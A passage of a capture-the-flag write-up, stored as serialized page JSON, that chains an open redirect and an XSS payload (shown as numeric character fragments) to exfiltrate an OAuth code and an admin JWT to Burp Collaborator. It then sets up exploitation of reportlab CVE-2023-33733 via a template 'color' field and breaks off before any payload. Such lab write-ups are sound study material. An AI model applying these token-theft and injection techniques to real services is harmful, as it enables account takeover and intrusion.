[33277],{"type":38,"value":33278},"117",{"type":33,"tag":128,"props":33280,"children":33281},{"style":312},[33282],{"type":38,"value":5584},{"type":33,"tag":128,"props":33284,"children":33285},{"style":523},[33286],{"type":38,"value":32890},{"type":33,"tag":128,"props":33288,"children":33289},{"style":312},[33290],{"type":38,"value":5584},{"type":33,"tag":128,"props":33292,"children":33293},{"style":523},[33294],{"type":38,"value":32839},{"type":33,"tag":128,"props":33296,"children":33297},{"style":312},[33298],{"type":38,"value":5584},{"type":33,"tag":128,"props":33300,"children":33301},{"style":523},[33302],{"type":38,"value":32565},{"type":33,"tag":128,"props":33304,"children":33305},{"style":312},[33306],{"type":38,"value":5584},{"type":33,"tag":128,"props":33308,"children":33309},{"style":523},[33310],{"type":38,"value":32644},{"type":33,"tag":128,"props":33312,"children":33313},{"style":312},[33314],{"type":38,"value":5584},{"type":33,"tag":128,"props":33316,"children":33317},{"style":523},[33318],{"type":38,"value":32600},{"type":33,"tag":128,"props":33320,"children":33321},{"style":312},[33322],{"type":38,"value":5584},{"type":33,"tag":128,"props":33324,"children":33325},{"style":523},[33326],{"type":38,"value":32925},{"type":33,"tag":128,"props":33328,"children":33329},{"style":312},[33330],{"type":38,"value":5584},{"type":33,"tag":128,"props":33332,"children":33333},{"style":523},[33334],{"type":38,"value":32583},{"type":33,"tag":128,"props":33336,"children":33337},{"style":312},[33338],{"type":38,"value":5584},{"type":33,"tag":128,"props":33340,"children":33341},{"style":523},[33342],{"type":38,"value":32574},{"type":33,"tag":128,"props":33344,"children":33345},{"style":312},[33346],{"type":38,"value":5584},{"type":33,"tag":128,"props":33348,"children":33349},{"style":523},[33350],{"type":38,"value":33097},{"type":33,"tag":128,"props":33352,"children":33353},{"style":312},[33354],{"type":38,"value":5584},{"type":33,"tag":128,"props":33356,"children":33357},{"style":523},[33358],{"type":38,"value":32600},{"type":33,"tag":128,"props":33360,"children":33361},{"style":312},[33362],{"type":38,"value":5584},{"type":33,"tag":128,"props":33364,"children":33365},{"style":523},[33366],{"type":38,"value":32556},{"type":33,"tag":128,"props":33368,"children":33369},{"style":312},[33370],{"type":38,"value":5584},{"type":33,"tag":128,"props":33372,"children":33373},{"style":523},[33374],{"type":38,"value":32565},{"type":33,"tag":128,"props":33376,"children":33377},{"style":312},[33378],{"type":38,"value":5584},{"type":33,"tag":128,"props":33380,"children":33381},{"style":523},[33382],{"type":38,"value":32565},{"type":33,"tag":128,"props":33384,"children":33385},{"style":312},[33386],{"type":38,"value":5584},{"type":33,"tag":128,"props":33388,"children":33389},{"style":523},[33390],{"type":38,"value":32839},{"type":33,"tag":128,"props":33392,"children":33393},{"style":312},[33394],{"type":38,"value":5584},{"type":33,"tag":128,"props":33396,"children":33397},{"style":523},[33398],{"type":38,"value":33399},"114",{"type":33,"tag":128,"props":33401,"children":33402},{"style":312},[33403],{"type":38,"value":5584},{"type":33,"tag":128,"props":33405,"children":33406},{"style":523},[33407],{"type":38,"value":33408},"72",{"type":33,"tag":128,"props":33410,"children":33411},{"style":312},[33412],{"type":38,"value":5584},{"type":33,"tag":128,"props":33414,"children":33415},{"style":523},[33416],{"type":38,"value":33417},"84",{"type":33,"tag":128,"props":33419,"children":33420},{"style":312},[33421],{"type":38,"value":5584},{"type":33,"tag":128,"props":33423,"children":33424},{"style":523},[33425],{"type":38,"value":33426},"77",{"type":33,"tag":128,"props":33428,"children":33429},{"style":312},[33430],{"type":38,"value":5584},{"type":33,"tag":128,"props":33432,"children":33433},{"style":523},[33434],{"type":38,"value":33435},"76",{"type":33,"tag":128,"props":33437,"children":33438},{"style":312},[33439],{"type":38,"value":5584},{"type":33,"tag":128,"props":33441,"children":33442},{"style":523},[33443],{"type":38,"value":33444},"41",{"type":33,"tag":128,"props":33446,"children":33447},{"style":312},[33448],{"type":38,"value":5584},{"type":33,"tag":128,"props":33450,"children":33451},{"style":523},[33452],{"type":38,"value":33453},"125",{"type":33,"tag":128,"props":33455,"children":33456},{"style":312},[33457],{"type":38,"value":5584},{"type":33,"tag":128,"props":33459,"children":33460},{"style":523},[33461],{"type":38,"value":32702},{"type":33,"tag":128,"props":33463,"children":33464},{"style":312},[33465],{"type":38,"value":7088},{"type":33,"tag":128,"props":33467,"children":33468},{"style":676},[33469],{"type":38,"value":6040},{"type":33,"tag":128,"props":33471,"children":33472},{"style":312},[33473],{"type":38,"value":6097},{"type":33,"tag":47,"props":33475,"children":33476},{},[33477],{"type":38,"value":33478},"So, now we have our openredirect vulnerability, our xss, just chain them together allowing us to retrieve the admin token from the service on port 4000.",{"type":33,"tag":81,"props":33480,"children":33482},{"id":33481},"oauth2code",[33483],{"type":38,"value":32220},{"type":33,"tag":47,"props":33485,"children":33486},{},[33487,33489,33495],{"type":38,"value":33488},"First, we call the bot by redirecting it to the oauth2/code route using the open redirect exploit. And we add the redirection_url parameters as our Burp Collaborator url. This allows us to retrieve the ",{"type":33,"tag":105,"props":33490,"children":33492},{"className":33491},[],[33493],{"type":38,"value":33494},"authorization_code",{"type":38,"value":33496}," parameter.",{"type":33,"tag":47,"props":33498,"children":33499},{},[33500],{"type":38,"value":33501},"You can find below the sent request:",{"type":33,"tag":75,"props":33503,"children":33505},{"imgSrc":33504},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704320776/writeups/phantom-feed/request_get_code_oauth2.webp",[],{"type":33,"tag":47,"props":33507,"children":33508},{},[33509],{"type":38,"value":33510},"We can see:",{"type":33,"tag":239,"props":33512,"children":33513},{},[33514,33519,33531,33543],{"type":33,"tag":243,"props":33515,"children":33516},{},[33517],{"type":38,"value":33518},"In white, the HTTP headers of the request with the token of the user.",{"type":33,"tag":243,"props":33520,"children":33521},{},[33522,33524,33529],{"type":38,"value":33523},"In green, the exploitation of the open redirect that redirects the bot to the ",{"type":33,"tag":105,"props":33525,"children":33527},{"className":33526},[],[33528],{"type":38,"value":32316},{"type":38,"value":33530}," route.",{"type":33,"tag":243,"props":33532,"children":33533},{},[33534,33536,33541],{"type":38,"value":33535},"In blue, the ",{"type":33,"tag":105,"props":33537,"children":33539},{"className":33538},[],[33540],{"type":38,"value":32362},{"type":38,"value":33542}," parameter that includes the URL of our Burp Collaborator.",{"type":33,"tag":243,"props":33544,"children":33545},{},[33546],{"type":38,"value":33547},"In red, our XSS payload.",{"type":33,"tag":47,"props":33549,"children":33550},{},[33551,33553],{"type":38,"value":33552},"Here we note that our XSS payload is present but will actually be executed only in the next step. This payload is present because ",{"type":33,"tag":2302,"props":33554,"children":33555},{},[33556,33558,33564,33565,33571],{"type":38,"value":33557},"it is imperative that the client_id and redirect_url parameters be identical during both calls (",{"type":33,"tag":105,"props":33559,"children":33561},{"className":33560},[],[33562],{"type":38,"value":33563},"/code",{"type":38,"value":6345},{"type":33,"tag":105,"props":33566,"children":33568},{"className":33567},[],[33569],{"type":38,"value":33570},"/token",{"type":38,"value":6700},{"type":33,"tag":47,"props":33573,"children":33574},{},[33575,33577,33582],{"type":38,"value":33576},"We can see below the response sent to our collaborator. We can get now the ",{"type":33,"tag":105,"props":33578,"children":33580},{"className":33579},[],[33581],{"type":38,"value":33494},{"type":38,"value":33583}," parameter is present in the response.",{"type":33,"tag":75,"props":33585,"children":33587},{"imgSrc":33586},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319319/writeups/phantom-feed/oauth_token_get_authorized_code.webp",[],{"type":33,"tag":81,"props":33589,"children":33591},{"id":33590},"oauth2token",[33592],{"type":38,"value":33593},"oauth2/token",{"type":33,"tag":47,"props":33595,"children":33596},{},[33597,33599,33605],{"type":38,"value":33598},"So now, we have our ",{"type":33,"tag":105,"props":33600,"children":33602},{"className":33601},[],[33603],{"type":38,"value":33604},"authorized_code",{"type":38,"value":33606}," which was sent back to us by our collaborator.",{"type":33,"tag":47,"props":33608,"children":33609},{},[33610,33612,33617,33619,33624],{"type":38,"value":33611},"The next step is to use the ",{"type":33,"tag":105,"props":33613,"children":33615},{"className":33614},[],[33616],{"type":38,"value":33604},{"type":38,"value":33618}," with a call to the ",{"type":33,"tag":105,"props":33620,"children":33622},{"className":33621},[],[33623],{"type":38,"value":32262},{"type":38,"value":33625}," route using the open redirect (as in the previous step). At this point, the bot will execute our XSS payload, which will return the body of the response. This body will contain the administrator's token.",{"type":33,"tag":47,"props":33627,"children":33628},{},[33629,33631,33636],{"type":38,"value":33630},"Only the ",{"type":33,"tag":105,"props":33632,"children":33634},{"className":33633},[],[33635],{"type":38,"value":33494},{"type":38,"value":33637}," parameter was added to the request.",{"type":33,"tag":75,"props":33639,"children":33641},{"imgSrc":33640},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704321315/writeups/phantom-feed/request_get_token_admin_oauth2.webp",[],{"type":33,"tag":47,"props":33643,"children":33644},{},[33645],{"type":38,"value":33646},"We can see below the response sent to our collaborator.",{"type":33,"tag":75,"props":33648,"children":33650},{"imgSrc":33649},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319375/writeups/phantom-feed/oauth2_body_stealed.webp",[],{"type":33,"tag":47,"props":33652,"children":33653},{},[33654],{"type":38,"value":33655},"If we decode the JWT, we can see that the data part indeed carries the user \"administrator\", allowing us to proceed to the next step.",{"type":33,"tag":75,"props":33657,"children":33659},{"imgSrc":33658},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704319406/writeups/phantom-feed/admin_token.webp",[],{"type":33,"tag":47,"props":33661,"children":33662},{},[33663],{"type":38,"value":33664},"On the following chapter, we will detail what is possible to do as an administrator.",{"type":33,"tag":40,"props":33666,"children":33668},{"id":33667},"exploit-reportlab-library-cve-2023-33733",[33669],{"type":38,"value":33670},"Exploit reportlab library (CVE-2023-33733)",{"type":33,"tag":47,"props":33672,"children":33673},{},[33674],{"type":38,"value":33675},"We now have an admin token that allows us to interact with the port 4000 service. If we take a closer look at the routes of this service, we can see that one route is particularly interesting:",{"type":33,"tag":114,"props":33677,"children":33678},{"lang":10227},[33679],{"type":33,"tag":119,"props":33680,"children":33682},{"className":10231,"code":33681,"language":10227,"meta":8,"style":8},"@web.route(\"/orders/html\", methods = [\"POST\"])\n@admin_middleware\ndef orders_html():\n color = request.form.get(\"color\")\n\n if not color:\n return response(\"No color\"), 400\n\n db_session = Database()\n orders = db_session.get_all_orders()\n \n if not orders:\n return response(\"No orders placed\"), 200\n\n orders_template = render_template(\"orders.html\", color=color)\n \n html2pdf = HTML2PDF()\n pdf = html2pdf.convert(orders_template, orders)\n \n pdf.seek(0)\n return send_file(pdf, as_attachment=True, download_name=\"orders.pdf\", mimetype=\"application/pdf\")\n",[33683],{"type":33,"tag":105,"props":33684,"children":33685},{"__ignoreMap":8},[33686,33754,33766,33782,33835,33842,33863,33900,33907,33928,33957,33964,33984,34020,34027,34080,34087,34108,34155,34162,34191],{"type":33,"tag":128,"props":33687,"children":33688},{"class":130,"line":131},[33689,33693,33697,33701,33705,33709,33713,33718,33722,33726,33730,33734,33738,33742,33746,33750],{"type":33,"tag":128,"props":33690,"children":33691},{"style":312},[33692],{"type":38,"value":29642},{"type":33,"tag":128,"props":33694,"children":33695},{"style":135},[33696],{"type":38,"value":29647},{"type":33,"tag":128,"props":33698,"children":33699},{"style":312},[33700],{"type":38,"value":215},{"type":33,"tag":128,"props":33702,"children":33703},{"style":135},[33704],{"type":38,"value":29656},{"type":33,"tag":128,"props":33706,"children":33707},{"style":312},[33708],{"type":38,"value":5566},{"type":33,"tag":128,"props":33710,"children":33711},{"style":676},[33712],{"type":38,"value":669},{"type":33,"tag":128,"props":33714,"children":33715},{"style":140},[33716],{"type":38,"value":33717},"/orders/html",{"type":33,"tag":128,"props":33719,"children":33720},{"style":676},[33721],{"type":38,"value":669},{"type":33,"tag":128,"props":33723,"children":33724},{"style":312},[33725],{"type":38,"value":5584},{"type":33,"tag":128,"props":33727,"children":33728},{"style":306},[33729],{"type":38,"value":29682},{"type":33,"tag":128,"props":33731,"children":33732},{"style":312},[33733],{"type":38,"value":5657},{"type":33,"tag":128,"props":33735,"children":33736},{"style":312},[33737],{"type":38,"value":718},{"type":33,"tag":128,"props":33739,"children":33740},{"style":676},[33741],{"type":38,"value":669},{"type":33,"tag":128,"props":33743,"children":33744},{"style":140},[33745],{"type":38,"value":1406},{"type":33,"tag":128,"props":33747,"children":33748},{"style":676},[33749],{"type":38,"value":669},{"type":33,"tag":128,"props":33751,"children":33752},{"style":312},[33753],{"type":38,"value":29721},{"type":33,"tag":128,"props":33755,"children":33756},{"class":130,"line":362},[33757,33761],{"type":33,"tag":128,"props":33758,"children":33759},{"style":312},[33760],{"type":38,"value":29642},{"type":33,"tag":128,"props":33762,"children":33763},{"style":135},[33764],{"type":38,"value":33765},"admin_middleware\n",{"type":33,"tag":128,"props":33767,"children":33768},{"class":130,"line":403},[33769,33773,33778],{"type":33,"tag":128,"props":33770,"children":33771},{"style":300},[33772],{"type":38,"value":10402},{"type":33,"tag":128,"props":33774,"children":33775},{"style":135},[33776],{"type":38,"value":33777}," orders_html",{"type":33,"tag":128,"props":33779,"children":33780},{"style":312},[33781],{"type":38,"value":10412},{"type":33,"tag":128,"props":33783,"children":33784},{"class":130,"line":739},[33785,33790,33794,33798,33802,33806,33810,33814,33818,33822,33827,33831],{"type":33,"tag":128,"props":33786,"children":33787},{"style":323},[33788],{"type":38,"value":33789}," color ",{"type":33,"tag":128,"props":33791,"children":33792},{"style":312},[33793],{"type":38,"value":315},{"type":33,"tag":128,"props":33795,"children":33796},{"style":323},[33797],{"type":38,"value":14050},{"type":33,"tag":128,"props":33799,"children":33800},{"style":312},[33801],{"type":38,"value":215},{"type":33,"tag":128,"props":33803,"children":33804},{"style":323},[33805],{"type":38,"value":14844},{"type":33,"tag":128,"props":33807,"children":33808},{"style":312},[33809],{"type":38,"value":215},{"type":33,"tag":128,"props":33811,"children":33812},{"style":323},[33813],{"type":38,"value":13526},{"type":33,"tag":128,"props":33815,"children":33816},{"style":312},[33817],{"type":38,"value":5566},{"type":33,"tag":128,"props":33819,"children":33820},{"style":676},[33821],{"type":38,"value":669},{"type":33,"tag":128,"props":33823,"children":33824},{"style":140},[33825],{"type":38,"value":33826},"color",{"type":33,"tag":128,"props":33828,"children":33829},{"style":676},[33830],{"type":38,"value":669},{"type":33,"tag":128,"props":33832,"children":33833},{"style":312},[33834],{"type":38,"value":2427},{"type":33,"tag":128,"props":33836,"children":33837},{"class":130,"line":765},[33838],{"type":33,"tag":128,"props":33839,"children":33840},{"emptyLinePlaceholder":896},[33841],{"type":38,"value":899},{"type":33,"tag":128,"props":33843,"children":33844},{"class":130,"line":804},[33845,33849,33854,33859],{"type":33,"tag":128,"props":33846,"children":33847},{"style":1576},[33848],{"type":38,"value":16415},{"type":33,"tag":128,"props":33850,"children":33851},{"style":300},[33852],{"type":38,"value":33853}," not",{"type":33,"tag":128,"props":33855,"children":33856},{"style":323},[33857],{"type":38,"value":33858}," color",{"type":33,"tag":128,"props":33860,"children":33861},{"style":312},[33862],{"type":38,"value":5318},{"type":33,"tag":128,"props":33864,"children":33865},{"class":130,"line":839},[33866,33870,33875,33879,33883,33888,33892,33896],{"type":33,"tag":128,"props":33867,"children":33868},{"style":1576},[33869],{"type":38,"value":6810},{"type":33,"tag":128,"props":33871,"children":33872},{"style":323},[33873],{"type":38,"value":33874}," response",{"type":33,"tag":128,"props":33876,"children":33877},{"style":312},[33878],{"type":38,"value":5566},{"type":33,"tag":128,"props":33880,"children":33881},{"style":676},[33882],{"type":38,"value":669},{"type":33,"tag":128,"props":33884,"children":33885},{"style":140},[33886],{"type":38,"value":33887},"No color",{"type":33,"tag":128,"props":33889,"children":33890},{"style":676},[33891],{"type":38,"value":669},{"type":33,"tag":128,"props":33893,"children":33894},{"style":312},[33895],{"type":38,"value":30055},{"type":33,"tag":128,"props":33897,"children":33898},{"style":523},[33899],{"type":38,"value":6988},{"type":33,"tag":128,"props":33901,"children":33902},{"class":130,"line":848},[33903],{"type":33,"tag":128,"props":33904,"children":33905},{"emptyLinePlaceholder":896},[33906],{"type":38,"value":899},{"type":33,"tag":128,"props":33908,"children":33909},{"class":130,"line":976},[33910,33915,33919,33924],{"type":33,"tag":128,"props":33911,"children":33912},{"style":323},[33913],{"type":38,"value":33914}," db_session ",{"type":33,"tag":128,"props":33916,"children":33917},{"style":312},[33918],{"type":38,"value":315},{"type":33,"tag":128,"props":33920,"children":33921},{"style":323},[33922],{"type":38,"value":33923}," Database",{"type":33,"tag":128,"props":33925,"children":33926},{"style":312},[33927],{"type":38,"value":7857},{"type":33,"tag":128,"props":33929,"children":33930},{"class":130,"line":988},[33931,33936,33940,33944,33948,33953],{"type":33,"tag":128,"props":33932,"children":33933},{"style":323},[33934],{"type":38,"value":33935}," orders ",{"type":33,"tag":128,"props":33937,"children":33938},{"style":312},[33939],{"type":38,"value":315},{"type":33,"tag":128,"props":33941,"children":33942},{"style":323},[33943],{"type":38,"value":29780},{"type":33,"tag":128,"props":33945,"children":33946},{"style":312},[33947],{"type":38,"value":215},{"type":33,"tag":128,"props":33949,"children":33950},{"style":323},[33951],{"type":38,"value":33952},"get_all_orders",{"type":33,"tag":128,"props":33954,"children":33955},{"style":312},[33956],{"type":38,"value":7857},{"type":33,"tag":128,"props":33958,"children":33959},{"class":130,"line":1001},[33960],{"type":33,"tag":128,"props":33961,"children":33962},{"style":323},[33963],{"type":38,"value":5894},{"type":33,"tag":128,"props":33965,"children":33966},{"class":130,"line":1014},[33967,33971,33975,33980],{"type":33,"tag":128,"props":33968,"children":33969},{"style":1576},[33970],{"type":38,"value":16415},{"type":33,"tag":128,"props":33972,"children":33973},{"style":300},[33974],{"type":38,"value":33853},{"type":33,"tag":128,"props":33976,"children":33977},{"style":323},[33978],{"type":38,"value":33979}," orders",{"type":33,"tag":128,"props":33981,"children":33982},{"style":312},[33983],{"type":38,"value":5318},{"type":33,"tag":128,"props":33985,"children":33986},{"class":130,"line":1026},[33987,33991,33995,33999,34003,34008,34012,34016],{"type":33,"tag":128,"props":33988,"children":33989},{"style":1576},[33990],{"type":38,"value":6810},{"type":33,"tag":128,"props":33992,"children":33993},{"style":323},[33994],{"type":38,"value":33874},{"type":33,"tag":128,"props":33996,"children":33997},{"style":312},[33998],{"type":38,"value":5566},{"type":33,"tag":128,"props":34000,"children":34001},{"style":676},[34002],{"type":38,"value":669},{"type":33,"tag":128,"props":34004,"children":34005},{"style":140},[34006],{"type":38,"value":34007},"No orders placed",{"type":33,"tag":128,"props":34009,"children":34010},{"style":676},[34011],{"type":38,"value":669},{"type":33,"tag":128,"props":34013,"children":34014},{"style":312},[34015],{"type":38,"value":30055},{"type":33,"tag":128,"props":34017,"children":34018},{"style":523},[34019],{"type":38,"value":30060},{"type":33,"tag":128,"props":34021,"children":34022},{"class":130,"line":1038},[34023],{"type":33,"tag":128,"props":34024,"children":34025},{"emptyLinePlaceholder":896},[34026],{"type":38,"value":899},{"type":33,"tag":128,"props":34028,"children":34029},{"class":130,"line":1051},[34030,34035,34039,34043,34047,34051,34056,34060,34064,34068,34072,34076],{"type":33,"tag":128,"props":34031,"children":34032},{"style":323},[34033],{"type":38,"value":34034}," orders_template ",{"type":33,"tag":128,"props":34036,"children":34037},{"style":312},[34038],{"type":38,"value":315},{"type":33,"tag":128,"props":34040,"children":34041},{"style":323},[34042],{"type":38,"value":29983},{"type":33,"tag":128,"props":34044,"children":34045},{"style":312},[34046],{"type":38,"value":5566},{"type":33,"tag":128,"props":34048,"children":34049},{"style":676},[34050],{"type":38,"value":669},{"type":33,"tag":128,"props":34052,"children":34053},{"style":140},[34054],{"type":38,"value":34055},"orders.html",{"type":33,"tag":128,"props":34057,"children":34058},{"style":676},[34059],{"type":38,"value":669},{"type":33,"tag":128,"props":34061,"children":34062},{"style":312},[34063],{"type":38,"value":5584},{"type":33,"tag":128,"props":34065,"children":34066},{"style":306},[34067],{"type":38,"value":33858},{"type":33,"tag":128,"props":34069,"children":34070},{"style":312},[34071],{"type":38,"value":315},{"type":33,"tag":128,"props":34073,"children":34074},{"style":323},[34075],{"type":38,"value":33826},{"type":33,"tag":128,"props":34077,"children":34078},{"style":312},[34079],{"type":38,"value":2427},{"type":33,"tag":128,"props":34081,"children":34082},{"class":130,"line":1063},[34083],{"type":33,"tag":128,"props":34084,"children":34085},{"style":323},[34086],{"type":38,"value":5894},{"type":33,"tag":128,"props":34088,"children":34089},{"class":130,"line":1076},[34090,34095,34099,34104],{"type":33,"tag":128,"props":34091,"children":34092},{"style":323},[34093],{"type":38,"value":34094}," html2pdf ",{"type":33,"tag":128,"props":34096,"children":34097},{"style":312},[34098],{"type":38,"value":315},{"type":33,"tag":128,"props":34100,"children":34101},{"style":323},[34102],{"type":38,"value":34103}," HTML2PDF",{"type":33,"tag":128,"props":34105,"children":34106},{"style":312},[34107],{"type":38,"value":7857},{"type":33,"tag":128,"props":34109,"children":34110},{"class":130,"line":1089},[34111,34116,34120,34125,34129,34134,34138,34143,34147,34151],{"type":33,"tag":128,"props":34112,"children":34113},{"style":323},[34114],{"type":38,"value":34115}," pdf ",{"type":33,"tag":128,"props":34117,"children":34118},{"style":312},[34119],{"type":38,"value":315},{"type":33,"tag":128,"props":34121,"children":34122},{"style":323},[34123],{"type":38,"value":34124}," html2pdf",{"type":33,"tag":128,"props":34126,"children":34127},{"style":312},[34128],{"type":38,"value":215},{"type":33,"tag":128,"props":34130,"children":34131},{"style":323},[34132],{"type":38,"value":34133},"convert",{"type":33,"tag":128,"props":34135,"children":34136},{"style":312},[34137],{"type":38,"value":5566},{"type":33,"tag":128,"props":34139,"children":34140},{"style":323},[34141],{"type":38,"value":34142},"orders_template",{"type":33,"tag":128,"props":34144,"children":34145},{"style":312},[34146],{"type":38,"value":5584},{"type":33,"tag":128,"props":34148,"children":34149},{"style":323},[34150],{"type":38,"value":33979},{"type":33,"tag":128,"props":34152,"children":34153},{"style":312},[34154],{"type":38,"value":2427},{"type":33,"tag":128,"props":34156,"children":34157},{"class":130,"line":1101},[34158],{"type":33,"tag":128,"props":34159,"children":34160},{"style":323},[34161],{"type":38,"value":5894},{"type":33,"tag":128,"props":34163,"children":34164},{"class":130,"line":1114},[34165,34170,34174,34179,34183,34187],{"type":33,"tag":128,"props":34166,"children":34167},{"style":323},[34168],{"type":38,"value":34169}," pdf",{"type":33,"tag":128,"props":34171,"children":34172},{"style":312},[34173],{"type":38,"value":215},{"type":33,"tag":128,"props":34175,"children":34176},{"style":323},[34177],{"type":38,"value":34178},"seek",{"type":33,"tag":128,"props":34180,"children":34181},{"style":312},[34182],{"type":38,"value":5566},{"type":33,"tag":128,"props":34184,"children":34185},{"style":523},[34186],{"type":38,"value":10442},{"type":33,"tag":128,"props":34188,"children":34189},{"style":312},[34190],{"type":38,"value":2427},{"type":33,"tag":128,"props":34192,"children":34193},{"class":130,"line":1127},[34194,34198,34203,34207,34212,34216,34221,34225,34229,34233,34238,34242,34246,34251,34255,34259,34264,34268,34272,34277,34281],{"type":33,"tag":128,"props":34195,"children":34196},{"style":1576},[34197],{"type":38,"value":13056},{"type":33,"tag":128,"props":34199,"children":34200},{"style":323},[34201],{"type":38,"value":34202}," send_file",{"type":33,"tag":128,"props":34204,"children":34205},{"style":312},[34206],{"type":38,"value":5566},{"type":33,"tag":128,"props":34208,"children":34209},{"style":323},[34210],{"type":38,"value":34211},"pdf",{"type":33,"tag":128,"props":34213,"children":34214},{"style":312},[34215],{"type":38,"value":5584},{"type":33,"tag":128,"props":34217,"children":34218},{"style":306},[34219],{"type":38,"value":34220}," as_attachment",{"type":33,"tag":128,"props":34222,"children":34223},{"style":312},[34224],{"type":38,"value":315},{"type":33,"tag":128,"props":34226,"children":34227},{"style":1576},[34228],{"type":38,"value":30424},{"type":33,"tag":128,"props":34230,"children":34231},{"style":312},[34232],{"type":38,"value":5584},{"type":33,"tag":128,"props":34234,"children":34235},{"style":306},[34236],{"type":38,"value":34237}," download_name",{"type":33,"tag":128,"props":34239,"children":34240},{"style":312},[34241],{"type":38,"value":315},{"type":33,"tag":128,"props":34243,"children":34244},{"style":676},[34245],{"type":38,"value":669},{"type":33,"tag":128,"props":34247,"children":34248},{"style":140},[34249],{"type":38,"value":34250},"orders.pdf",{"type":33,"tag":128,"props":34252,"children":34253},{"style":676},[34254],{"type":38,"value":669},{"type":33,"tag":128,"props":34256,"children":34257},{"style":312},[34258],{"type":38,"value":5584},{"type":33,"tag":128,"props":34260,"children":34261},{"style":306},[34262],{"type":38,"value":34263}," mimetype",{"type":33,"tag":128,"props":34265,"children":34266},{"style":312},[34267],{"type":38,"value":315},{"type":33,"tag":128,"props":34269,"children":34270},{"style":676},[34271],{"type":38,"value":669},{"type":33,"tag":128,"props":34273,"children":34274},{"style":140},[34275],{"type":38,"value":34276},"application/pdf",{"type":33,"tag":128,"props":34278,"children":34279},{"style":676},[34280],{"type":38,"value":669},{"type":33,"tag":128,"props":34282,"children":34283},{"style":312},[34284],{"type":38,"value":2427},{"type":33,"tag":47,"props":34286,"children":34287},{},[34288,34290,34295,34297,34303],{"type":38,"value":34289},"This route is responsible for generating a PDF document of all orders, with a specified color, and sending it as a downloadable file in the response to a POST request at the ",{"type":33,"tag":105,"props":34291,"children":34293},{"className":34292},[],[34294],{"type":38,"value":33717},{"type":38,"value":34296}," route. It uses the ",{"type":33,"tag":105,"props":34298,"children":34300},{"className":34299},[],[34301],{"type":38,"value":34302},"render_template",{"type":38,"value":34304}," function to render the orders.html template, which is then converted to a PDF using the HTML2PDF class.",{"type":33,"tag":47,"props":34306,"children":34307},{},[34308,34310,34315],{"type":38,"value":34309},"You can find below the ",{"type":33,"tag":105,"props":34311,"children":34313},{"className":34312},[],[34314],{"type":38,"value":34055},{"type":38,"value":34316}," template:",{"type":33,"tag":114,"props":34318,"children":34319},{"lang":5929},[34320],{"type":33,"tag":119,"props":34321,"children":34323},{"className":5933,"code":34322,"language":5929,"meta":8,"style":8},"\u003C!-- orders.html -->\n\u003Cpara>\n \u003Cfont color=\"{{ color }}\">\n Orders:\n \u003C/font>\n\u003C/para>\n",[34324],{"type":33,"tag":105,"props":34325,"children":34326},{"__ignoreMap":8},[34327,34335,34352,34389,34397,34412],{"type":33,"tag":128,"props":34328,"children":34329},{"class":130,"line":131},[34330],{"type":33,"tag":128,"props":34331,"children":34332},{"style":5541},[34333],{"type":38,"value":34334},"\u003C!-- orders.html -->\n",{"type":33,"tag":128,"props":34336,"children":34337},{"class":130,"line":362},[34338,34342,34348],{"type":33,"tag":128,"props":34339,"children":34340},{"style":312},[34341],{"type":38,"value":5977},{"type":33,"tag":128,"props":34343,"children":34345},{"style":34344},"--shiki-default:#FDAEB7",[34346],{"type":38,"value":34347},"para",{"type":33,"tag":128,"props":34349,"children":34350},{"style":312},[34351],{"type":38,"value":6097},{"type":33,"tag":128,"props":34353,"children":34354},{"class":130,"line":403},[34355,34359,34364,34368,34372,34376,34381,34385],{"type":33,"tag":128,"props":34356,"children":34357},{"style":312},[34358],{"type":38,"value":6105},{"type":33,"tag":128,"props":34360,"children":34361},{"style":20986},[34362],{"type":38,"value":34363},"font",{"type":33,"tag":128,"props":34365,"children":34366},{"style":306},[34367],{"type":38,"value":33858},{"type":33,"tag":128,"props":34369,"children":34370},{"style":312},[34371],{"type":38,"value":315},{"type":33,"tag":128,"props":34373,"children":34374},{"style":676},[34375],{"type":38,"value":669},{"type":33,"tag":128,"props":34377,"children":34378},{"style":140},[34379],{"type":38,"value":34380},"{{ color }}",{"type":33,"tag":128,"props":34382,"children":34383},{"style":676},[34384],{"type":38,"value":669},{"type":33,"tag":128,"props":34386,"children":34387},{"style":312},[34388],{"type":38,"value":6097},{"type":33,"tag":128,"props":34390,"children":34391},{"class":130,"line":739},[34392],{"type":33,"tag":128,"props":34393,"children":34394},{"style":323},[34395],{"type":38,"value":34396}," Orders:\n",{"type":33,"tag":128,"props":34398,"children":34399},{"class":130,"line":765},[34400,34404,34408],{"type":33,"tag":128,"props":34401,"children":34402},{"style":312},[34403],{"type":38,"value":14993},{"type":33,"tag":128,"props":34405,"children":34406},{"style":20986},[34407],{"type":38,"value":34363},{"type":33,"tag":128,"props":34409,"children":34410},{"style":312},[34411],{"type":38,"value":6097},{"type":33,"tag":128,"props":34413,"children":34414},{"class":130,"line":804},[34415,34419,34423],{"type":33,"tag":128,"props":34416,"children":34417},{"style":312},[34418],{"type":38,"value":6190},{"type":33,"tag":128,"props":34420,"children":34421},{"style":34344},[34422],{"type":38,"value":34347},{"type":33,"tag":128,"props":34424,"children":34425},{"style":312},[34426],{"type":38,"value":6097},{"type":33,"tag":47,"props":34428,"children":34429},{},[34430],{"type":38,"value":34431},"The class HTML2PDF is responsible for converting the HTML template to a PDF document. It uses the reportlab library to do this.",{"type":33,"tag":47,"props":34433,"children":34434},{},[34435],{"type":38,"value":34436},"Reportlab is an open-source project that allows generating PDF documents using the Python programming language. It supports the creation of graphics and data charts from various bitmap and vector formats, in addition to PDF.",{"type":33,"tag":114,"props":34438,"children":34439},{"lang":10227},[34440],{"type":33,"tag":119,"props":34441,"children":34443},{"className":10231,"code":34442,"language":10227,"meta":8,"style":8},"from reportlab.platypus import SimpleDocTemplate, Paragraph, Table, TableStyle\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.lib import colors\nfrom io import BytesIO\n\nclass HTML2PDF():\n def __init__(self):\n self.stream_file = BytesIO()\n self.content = []\n\n[...]\n\n def convert(self, html, data):\n doc = self.get_document_template(self.stream_file)\n self.add_paragraph(html)\n self.add_table(data)\n self.build_document(doc, self.content)\n return 